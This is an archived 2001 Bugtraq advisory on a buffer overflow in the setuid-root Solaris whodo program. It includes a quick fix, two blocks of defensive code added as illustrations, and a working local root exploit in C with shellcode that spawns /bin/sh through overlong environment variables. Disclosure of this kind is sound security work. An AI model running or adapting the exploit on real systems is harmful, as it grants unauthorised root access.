Solaris whodo Vulnerability

From: Pablo Sor (psorat_private)
Date: Thu Jul 05 2001 - 07:55:55 PDT


    Vulnerability in Solaris whodo 
    
    Date Published: July 5, 2001
    
    Advisory ID: N/A
    
    Bugtraq ID: 2935
    
    CVE CAN: None currently assigned.
    
    Title: Solaris whodo Buffer Overflow Vulnerability
    
    Class: Boundary Error Condition
    
    Remotely Exploitable: No
    
    Locally Exploitable: Yes
    
    Vulnerability Description:
    
    The whodo program is installed setuid root by default in Solaris.
    It contains a vulnerability in its handling of data taken from environment
    variables: if such a variable exceeds a predefined length, an exploitable
    stack overflow can occur.
    By exploiting this vulnerability a local attacker can gain effective
    uid root.
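As an added illustration (not part of the original advisory, and not Sun's whodo source, which is not shown here), the hardened pattern for taking an environment variable into a fixed-size buffer: the copy is bounded by the destination size, and a value that does not fit is rejected rather than written past the end of the array. The variable name CFTIME and the 256-byte limit are assumptions chosen for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the example; the real limit inside whodo is not
 * stated in the advisory. */
#define TIME_FMT_MAX 256

/*
 * Copy src into dst with explicit bounds.
 * Returns 0 on success, -1 if src is NULL, -2 if src (plus its terminating
 * NUL) does not fit in dstsize bytes. dst is always NUL-terminated on return
 * when dstsize > 0, so a rejected value never leaves garbage behind.
 */
int bounded_copy(const char *src, char *dst, size_t dstsize)
{
    size_t len;

    if (dstsize == 0)
        return -2;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    len = strlen(src);
    if (len >= dstsize)      /* no room for the NUL: reject, do not truncate */
        return -2;
    memcpy(dst, src, len + 1);
    return 0;
}

/*
 * Read an environment variable into a caller-supplied fixed buffer.
 * The unsafe pattern this replaces is strcpy(buf, getenv(name)) into a
 * fixed-size stack array, which is the class of bug the advisory describes.
 */
int read_env_bounded(const char *name, char *dst, size_t dstsize)
{
    return bounded_copy(getenv(name), dst, dstsize);
}

int main(void)
{
    char fmt[TIME_FMT_MAX];
    int rc = read_env_bounded("CFTIME", fmt, sizeof fmt);

    if (rc == 0)
        printf("CFTIME accepted (%zu bytes)\n", strlen(fmt));
    else if (rc == -1)
        printf("CFTIME not set, using default\n");
    else
        printf("CFTIME rejected: longer than %d bytes\n", TIME_FMT_MAX - 1);
    return 0;
}
```

Rejecting rather than silently truncating is deliberate: in a setuid program, an over-long value is far more likely to be hostile than accidental, and a truncated format string can still change behaviour in surprising ways.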
    
    Vulnerable Packages/Systems:
    
    SunOS 5.8 
    SunOS 5.7 
    SunOS 5.5.1 
    
    (not tested on other versions)
    
    Solution/Vendor :
    
    Sun Microsystems was notified on June 28, 2001. Patches are expected
    shortly.
    
    Quick Fix:
    
    Clear the setuid bit on the following binaries:
    
    /usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
    /usr/sbin/i86/whodo     (SunOS 5.8, 5.7 Intel)
    /usr/sbin/whodo         (SunOS 5.5.1)
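The quick fix above, as an added example that is not part of the advisory: a small C program that uses stat(2) and chmod(2) to report whether each listed whodo binary is still setuid and, when run with -f, clears only that bit while leaving the other permission bits untouched. The path list is the advisory's own; the self-test function exercises the helpers on a scratch file owned by the caller rather than on a real binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/* Paths named in the advisory's Quick Fix. */
static const char *const whodo_paths[] = {
    "/usr/sbin/sparcv7/whodo",   /* SunOS 5.8 SPARC */
    "/usr/sbin/i86/whodo",       /* SunOS 5.8, 5.7 Intel */
    "/usr/sbin/whodo",           /* SunOS 5.5.1 */
};

/* 1 if the setuid bit is set, 0 if clear, -1 if the path cannot be stat'ed. */
int has_setuid_bit(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Clear only the setuid bit; every other mode bit is preserved. */
int clear_setuid_bit(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if ((st.st_mode & S_ISUID) == 0)
        return 0;                                   /* already clear */
    return chmod(path, st.st_mode & ~(mode_t)S_ISUID) == 0 ? 0 : -1;
}

/*
 * Exercise both helpers on a scratch file (constructed for the example, no
 * real binary is touched). Returns 1 when the bit is observed set and then
 * clear, 0 otherwise.
 */
int selftest_on_tempfile(void)
{
    char name[64];
    int fd, ok = 0;

    snprintf(name, sizeof name, "/tmp/setuid-demo-%ld", (long)getpid());
    fd = open(name, O_CREAT | O_EXCL | O_WRONLY, 0755);
    if (fd < 0)
        return 0;
    if (chmod(name, S_IRWXU | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH | S_ISUID) == 0
        && has_setuid_bit(name) == 1
        && clear_setuid_bit(name) == 0
        && has_setuid_bit(name) == 0)
        ok = 1;
    close(fd);
    unlink(name);
    return ok;
}

int main(int argc, char **argv)
{
    int fix = (argc > 1 && strcmp(argv[1], "-f") == 0);
    size_t i;

    for (i = 0; i < sizeof whodo_paths / sizeof whodo_paths[0]; i++) {
        const char *p = whodo_paths[i];
        int s = has_setuid_bit(p);
        if (s < 0) {
            printf("%-26s not present\n", p);
            continue;
        }
        printf("%-26s setuid=%s\n", p, s ? "yes" : "no");
        if (s == 1 && fix)
            printf("  -> %s\n", clear_setuid_bit(p) == 0
                   ? "setuid bit cleared" : "chmod failed (run as root?)");
    }
    return 0;
}
```

Run it without arguments as an audit (for example from a cron job) so that the bit being restored by a later package install is noticed; run it as root with -f to apply the workaround until the vendor patch is installed.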
    
    Credits:
    
    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
    psorat_private, psorat_private
    
    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpat_private
    
    Technical Description - Exploit/Concept Code:
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <fcntl.h>
    
    /*
       /usr/sbin/i86/whodo overflow proof of concept.
    
       Pablo Sor, Buenos Aires, Argentina 06/2001
       psorat_private, psorat_private
    
       works against x86 solaris 8
    
       default offset +/- 100  should work.
    
    */
    
    /* Return the current stack pointer (left in %eax as the return value). */
    long get_esp() { __asm__("movl %esp,%eax"); }
    
    int main(int ac, char **av)
    {
    
    char shell[]=
     "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
     "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
     "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
     "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
     "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
     "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";
    
      unsigned long magic = get_esp() + 1180;  /* default offset */
    
      unsigned char buf[800];
      char *env;
    
      /* First environment variable (SOR=): 0x90 padding with the code placed
         at offset 160. The malloc'd string must be terminated explicitly. */
      env = (char *) malloc(400*sizeof(char));
      memset(env,0x90,400);
      memcpy(env+160,shell,strlen(shell));
      memcpy(env,"SOR=",4);
      env[399]=0;
      putenv(env);
      
      /* Second environment variable (CFTIME=): the overlong value that
         triggers the overflow, with the computed address at offset 271. */
      memset(buf,0x41,800);
      memcpy(buf+271,&magic,4);
      memcpy(buf,"CFTIME=",7);
      buf[799]=0;
      putenv((char *)buf);
    
      system("/usr/sbin/i86/whodo");
      return 0;
    }
    
    -- 
    Pablo Sor
    psorat_private, psorat_private
    



    This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 10:45:40 PDT